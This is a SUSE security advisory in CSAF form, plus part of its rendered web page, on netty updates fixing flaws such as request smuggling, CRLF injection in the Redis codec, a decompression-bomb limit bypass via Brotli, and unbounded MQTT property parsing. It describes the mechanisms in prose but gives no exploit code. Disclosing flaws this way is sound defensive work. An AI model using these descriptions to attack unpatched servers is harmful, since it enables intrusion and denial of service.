"baseScore": 5.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-16T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2026-42584"
},
{
"cve": "CVE-2026-42585",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42585"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, Netty incorrectly parses malformed Transfer-Encoding, enabling request smuggling attacks. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42585",
"url": "https://www.suse.com/security/cve/CVE-2026-42585"
},
{
"category": "external",
"summary": "SUSE Bug 1265291 for CVE-2026-42585",
"url": "https://bugzilla.suse.com/1265291"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-16T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2026-42585"
},
{
"cve": "CVE-2026-42586",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42586"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, the Netty Redis codec encoder (RedisEncoder) writes user-controlled string content directly to the network output buffer without validating or sanitizing CRLF (\\r\\n) characters. Since the Redis Serialization Protocol (RESP) uses CRLF as the command/response delimiter, an attacker who can control the content of a Redis message can inject arbitrary Redis commands or forge fake responses. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42586",
"url": "https://www.suse.com/security/cve/CVE-2026-42586"
},
{
"category": "external",
"summary": "SUSE Bug 1265245 for CVE-2026-42586",
"url": "https://bugzilla.suse.com/1265245"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.2,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-16T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-42586"
},
{
"cve": "CVE-2026-42587",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42587"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, HttpContentDecompressor accepts a maxAllocation parameter to limit decompression buffer size and prevent decompression bomb attacks. This limit is correctly enforced for gzip and deflate encodings via ZlibDecoder, but is silently ignored when the content encoding is br (Brotli), zstd, or snappy. An attacker can bypass the configured decompression limit by sending a compressed payload with Content-Encoding: br instead of Content-Encoding: gzip, causing unbounded memory allocation and out-of-memory denial of service. The same vulnerability exists in DelegatingDecompressorFrameListener for HTTP/2 connections. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42587",
"url": "https://www.suse.com/security/cve/CVE-2026-42587"
},
{
"category": "external",
"summary": "SUSE Bug 1265246 for CVE-2026-42587",
"url": "https://bugzilla.suse.com/1265246"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-16T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-42587"
},
{
"cve": "CVE-2026-44248",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-44248"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, the MQTT 5 header Properties section is parsed and buffered before any message size limit is applied. Specifically, in MqttDecoder, the decodeVariableHeader() method is called before the bytesRemainingBeforeVariableHeader \u003e maxBytesInMessage check. The decodeVariableHeader() can call other methods which will call decodeProperties(). Effectively, Netty does not apply any limits to the size of the properties being decoded. Additionally, because MqttDecoder extends ReplayingDecoder, Netty will repeatedly re-parse the enormous Properties sections and buffer the bytes in memory, until the entire thing parses to completion. This can cause high resource usage in both CPU and memory. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-44248",
"url": "https://www.suse.com/security/cve/CVE-2026-44248"
},
{
"category": "external",
"summary": "SUSE Bug 1265293 for CVE-2026-44248",
"url": "https://bugzilla.suse.com/1265293"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-16T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2026-44248"
}
]
}
SUSE-SU-2026:2308-1
Vulnerability from csaf_suse - Published: 2026-06-09 08:13 - Updated: 2026-06-09 08:13Summary
Security update for netty, netty-tcnative
Severity
Important
Notes
Title of the patch: Security update for netty, netty-tcnative
Description of the patch: This update for netty, netty-tcnative fixes the following issues
- CVE-2026-41417: missing validations leads to HTTP request smuggling and RTSP request injection via start-line
injection in `DefaultHttpRequest.setUri()` (bsc#1264350).
- CVE-2026-42578: HTTP Header Injection via HttpProxyHandler Disabled Validation in Netty (bsc#1265243).
- CVE-2026-42579: DNS codec does not enforce RFC 1035 domain name constraints during either encoding or decoding
(bsc#1265272).
- CVE-2026-42580: chunk size parser silently overflows int and enables request smuggling attacks (bsc#1265273).
- CVE-2026-42581: TE+CL header coexistence in HTTP/1.0 requests bypasses smuggling sanitization (bsc#1265277).
- CVE-2026-42583: resource exhaustion and possible denial of service via `Lz4FrameDecoder` (bsc#1265279).
- CVE-2026-42584: improper handling of inbound responses in `HttpClientCodec` can lead to response desynchronization
(bsc#1265280).
- CVE-2026-42585: Netty is an asynchronous, event-driven network application framework (bsc#1265292).
- CVE-2026-42586: CRLF Injection in Netty Redis Codec Encoder (bsc#1265245).
- CVE-2026-42587: HttpContentDecompressor maxAllocation bypass via Content-Encoding: br/zstd/snappy enables
decompression bomb DoS (bsc#1265246).
- CVE-2026-44248: Netty is an asynchronous, event-driven network application framework (bsc#1265294).
- CVE-2026-42582: HTTP/3 QPACK literal unbounded allocation (bsc#1265318).
Changes for netty:
- Upgrade to upstream version 4.1.133
Patchnames: SUSE-2026-2308,SUSE-SLE-Module-Development-Tools-15-SP7-2026-2308,SUSE-SLE-Module-Packagehub-Subpackages-15-SP7-2026-2308,SUSE-SLE-Product-HPC-15-SP4-ESPOS-2026-2308,SUSE-SLE-Product-HPC-15-SP4-LTSS-2026-2308,SUSE-SLE-Product-HPC-15-SP5-ESPOS-2026-2308,SUSE-SLE-Product-HPC-15-SP5-LTSS-2026-2308,SUSE-SLE-Product-SLES-15-SP4-LTSS-2026-2308,SUSE-SLE-Product-SLES-15-SP5-LTSS-2026-2308,SUSE-SLE-Product-SLES-15-SP6-LTSS-2026-2308,SUSE-SLE-Product-SLES_SAP-15-SP4-2026-2308,SUSE-SLE-Product-SLES_SAP-15-SP5-2026-2308,SUSE-SLE-Product-SLES_SAP-15-SP6-2026-2308
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
6.5 (Medium)
Affected products
Recommended
35 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
7.5 (High)
Affected products
Recommended
35 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
